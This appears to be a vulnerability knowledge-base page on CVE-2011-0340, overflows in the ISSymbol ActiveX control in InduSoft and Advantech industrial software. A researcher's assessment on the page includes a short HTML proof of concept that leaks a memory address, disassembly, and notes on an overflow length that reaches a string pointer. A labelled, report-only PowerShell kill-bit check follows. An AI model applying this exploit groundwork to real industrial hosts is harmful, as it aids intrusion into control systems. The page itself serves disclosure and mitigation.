CVSS2 score: 9.3 High
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value; or (4) a long bstrFileName argument to the OpenScreen method.
Recent assessments:
wchen-r7 at September 12, 2019 6:08pm UTC reported:
The ForceRemoteBehavior getter, when using an “uninitialized” issymbol
object, allows disclosing an address from issymbol. Issymbol isn’t ASLR
compatible, but could rebase. Anyway, issymbol doesn’t contain pointers
to interesting APIs for ASLR bypass, so even when it would be easy
to use the issymbol.dll it won’t be useful because of this.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<!-- instantiate the ISSymbol control and read the ForceRemoteBehavior getter -->
<object classid='clsid:3c9dff6f-5cb0-422e-9978-d6405d10718f' id='test'></object>
<script language='javascript'>
alert(test.ForceRemoteBehavior);
</script>
</body>
</html>
Overflowing the vulnerable InternationalSeparator() method with 212 bytes
allows reaching the pointer to the StartupColumnTranslate property (string).
By overflowing this pointer it should be possible to retrieve arbitrary data
from the memory map by using the StartupColumnTranslate getter:
.text:1000EF40 StartupColumnTranslate_sub_1000EF40 proc near ; DATA XREF: .rdata:101DCE98o
.text:1000EF40
.text:1000EF40 var_10 = byte ptr -10h
.text:1000EF40 var_C = dword ptr -0Ch
.text:1000EF40 var_4 = dword ptr -4
.text:1000EF40
.text:1000EF40 push 0FFFFFFFFh
.text:1000EF42 push offset sub_101B7579
.text:1000EF47 mov eax, large fs:0
.text:1000EF4D push eax
.text:1000EF4E push ecx
.text:1000EF4F push esi
.text:1000EF50 mov eax, ___security_cookie
.text:1000EF55 xor eax, esp
.text:1000EF57 push eax
.text:1000EF58 lea eax, [esp+18h+var_C]
.text:1000EF5C mov large fs:0, eax
.text:1000EF62 add ecx, 2540h ; ecx + 2540h => pointer to StartupColumnTranslate property
.text:1000EF68 push ecx
.text:1000EF69 lea ecx, [esp+1Ch+var_10]
.text:1000EF6D call ds:??0?$CStringT@_WV?$StrTraitMFC_DLL@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@QAE@ABV01@@Z ; ATL::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>(CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>> const &)
.text:1000EF73 lea ecx, [esp+18h+var_10]
.text:1000EF77 mov [esp+18h+var_4], 0
.text:1000EF7F call ds:?AllocSysString@?$CStringT@_WV?$StrTraitMFC_DLL@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@QBEPA_WXZ ; ATL::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::AllocSysString(void)
.text:1000EF85 lea ecx, [esp+18h+var_10] ; void *
.text:1000EF89 mov esi, eax
.text:1000EF8B call ds:__imp_??1?$CStringT@_WV?$StrTraitMFC_DLL@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@QAE@XZ ; ATL::CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>::~CStringT<wchar_t,StrTraitMFC_DLL<wchar_t,ATL::ChTraitsCRT<wchar_t>>>(void)
.text:1000EF91 mov eax, esi
.text:1000EF93 mov ecx, [esp+18h+var_C]
.text:1000EF97 mov large fs:0, ecx
.text:1000EF9E pop ecx
.text:1000EF9F pop esi
.text:1000EFA0 add esp, 10h
.text:1000EFA3 retn
.text:1000EFA3 StartupColumnTranslate_sub_1000EF40 endp
PROBLEM: It’s using the Microsoft Foundation Classes, and creating fake
string memory objects in memory isn’t so easy! We should dig into that;
it should be possible with more work!
Assessed Attacker Value: 0
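The standard host-side mitigation for an ActiveX overflow like this one, while a vendor hotfix from the references is applied, is to set the Internet Explorer kill bit on the control's CLSID so the browser refuses to instantiate it. The following PowerShell script is an added example, not code from the AttackerKB page, the assessment above or the vendor: it takes the CLSID from the PoC above, reports which ISSymbol.ocx is registered for it and whether its file version is one of the two the description lists as affected, and checks whether the kill bit (Compatibility Flags 0x400) is already set. The registry locations are the documented Microsoft ones; the assumption is only that the script runs on the Windows host where the control is installed.

```powershell
# Added example (not from the page or the vendor): inventory and kill-bit check
# for the ISSymbol ActiveX control. CLSID taken from the PoC in the assessment.
$clsid = '{3c9dff6f-5cb0-422e-9978-d6405d10718f}'

# Versions named as affected in the CVE description on this page.
$affectedVersions = @('61.6.0.0', '301.1009.2904.0')

# Documented kill-bit locations (native and 32-bit-on-64-bit views).
$killBitKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
)

function Test-KillBit {
    param([string]$Path)
    if (-not (Test-Path -Path $Path)) { return $false }
    $flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    # 0x400 is the documented "kill bit" flag value.
    return ($null -ne $flags) -and (($flags -band 0x400) -eq 0x400)
}

# Which OCX is registered for this CLSID? InprocServer32's default value is the path.
$inproc = "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32"
if (Test-Path -Path $inproc) {
    $ocx = (Get-ItemProperty -Path $inproc).'(default)'
    if ($ocx -and (Test-Path -Path $ocx)) {
        $ver = (Get-Item -Path $ocx).VersionInfo.FileVersion
        Write-Output "ISSymbol control registered: $ocx (file version $ver)"
        if ($affectedVersions -contains $ver) {
            Write-Output "File version matches a version listed as affected by CVE-2011-0340"
        }
    } else {
        Write-Output "CLSID is registered but the OCX file was not found: $ocx"
    }
} else {
    Write-Output "ISSymbol CLSID $clsid is not registered on this host"
}

# Is the control already blocked in Internet Explorer?
$killed = $false
foreach ($key in $killBitKeys) {
    if (Test-KillBit -Path $key) { $killed = $true }
}
Write-Output ("Kill bit set for {0}: {1}" -f $clsid, $killed)
if (-not $killed) {
    Write-Output "Not blocked: to set the kill bit, create a DWORD 'Compatibility Flags' = 0x400 under each ActiveX Compatibility key above (requires administrator rights), then apply the vendor hotfix from the references."
}
```

Run the script in an elevated session so that both HKLM views are readable; it only reports and does not change the registry, so the actual kill-bit write stays an explicit administrative step.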
ics-cert.us-cert.gov/advisories/ICSA-12-249-03
secunia.com/advisories/42928
secunia.com/advisories/43116
secunia.com/secunia_research/2011-36
secunia.com/secunia_research/2011-37
www.advantechdirect.com/eMarketingPrograms/AStudio_Patch/AStudio7.0_Patch_Final.htm
www.indusoft.com/hotfixes/hotfixes.php
www.securityfocus.com/bid/47596
www.us-cert.gov/control_systems/pdf/ICSA-12-137-02.pdf
www.vupen.com/english/advisories/2011/1115
www.vupen.com/english/advisories/2011/1116
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0340